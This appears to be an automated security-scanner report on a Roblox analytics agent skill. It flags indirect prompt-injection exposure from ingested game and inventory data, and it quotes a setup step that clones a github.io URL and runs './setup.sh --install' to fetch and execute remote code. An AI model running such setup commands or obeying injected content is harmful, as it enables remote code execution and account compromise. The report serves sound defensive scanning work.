mm2-analytics-dashboard-roblox

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 0.90). The SKILL.md explicitly instructs syncing and ingesting user data from Roblox (e.g., "python3 main.py --sync-inventory" and InventoryManager.sync_from_roblox()) and uses that user-generated game/inventory and recent-game data to drive AI recommendations and trade/strategy actions, exposing the agent to untrusted third-party content that could carry indirect prompt-injection.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The skill's automated setup runs "git clone https://8015238355.github.io" and then makes and executes "./setup.sh --install", which fetches remote code from https://8015238355.github.io and executes it during setup, presenting a clear remote-code-execution risk.